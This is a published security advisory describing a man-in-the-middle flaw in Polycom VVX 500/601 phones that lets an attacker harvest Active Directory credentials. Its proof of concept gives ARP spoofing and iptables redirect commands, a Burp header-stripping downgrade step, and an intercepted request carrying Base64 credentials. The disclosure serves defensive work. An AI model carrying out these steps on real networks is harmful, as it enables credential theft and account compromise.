Polycom VVX 500 / VVX 601 5.8.0.12848 Man-In-The-Middle Vulnerability

Polycom VVX 500 / VVX 601 5.8.0.12848 Man-In-The-Middle Vulnerability

Product:                   VVX 500 / VVX 601
Manufacturer:              Polycom
Affected Version(s):       <= 5.8.0.12848
Tested Version(s):         5.4.0.10182, 5.8.0.12848
Vulnerability Type:        X.509 validation - Man-in-the-Middle (CWE-300)
Risk Level:                Medium
Solution Status:           Open
Manufacturer Notification: 2018-08-29
Solution Date:             20??-??-??
Public Disclosure:         2018-10-23
CVE Reference:        CVE-2018-18568
Author of Advisory:        Micha Borrmann (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

If a Polycom VVX 500/601 [1] is used with an on-premise installation
with Skype for Business, the phone has stored credentials of an
account in the active directory. Performing a man-in-the-middle
attack, the phone give the credentials to an attacker and therefore
the account will be compromised.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The phone sends the stored credentials to a website usually named
autodiscover via HTTPS, but no X.509 certificate validation is used.
The credentials are sent with the challenge-response NetNTLM
algorithm. Performing a downgrade attack to HTTP basic authentication,
the credentials can be harvested Base64 encoded.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Using Burp Suite as invisible proxy.

Perform an ARP spoofing attack against the phone that the data traffic
is going the the device were the Burp Suite is running. All attacks
are started from the same device.

# arpspoof -i eth0 -t 192.168.100.101 192.168.100.1

Set an iptables rule, that the traffic is sent to the Burp Suite, like

# iptables -A PREROUTING -t nat -i eth0 -s 192.168.100.101 -p tcp --dport 443 -j REDIRECT --to-port 8080

Enable rules with the Burp Suite to suppress these two response headers:

WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM

Now, an authentication downgrade attack is in place, too.

Watch the proxy history for a HTTP POST request like

POST /autodiscover/autodiscover.xml HTTP/1.1
Content-Type: text/xml; charset=utf-8
Content-Length: 454
Connection: close
Accept-Encoding: gzip, deflate
Accept-Language: en,*
User-Agent: Mozilla/5.0
Host: autodiscover.example.com
Authorization: Basic ZXhhbXBsZVxBRGFjY291bnRuYW1lOnZlcnl0b3BzZWNyZXRwYXNzd29yZA==

Decode the harvested Base64 encoded credential information.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Install the new firmware, which has a trust store integrated and a
strict X.509 certificate validation policy, too.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2018-08-13: Detection of the vulnerability
2018-08-29: Vulnerability reported to manufacturer
2018-10-22: CVE number assigned
2018-10-23: Public release of the security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:
[1] Product web sites for the phones
    https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx500.html
    https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx601.html
[2] SySS Security Advisory SYSS-2018-027
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-027.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy/

#  0day.today [2018-10-25]  #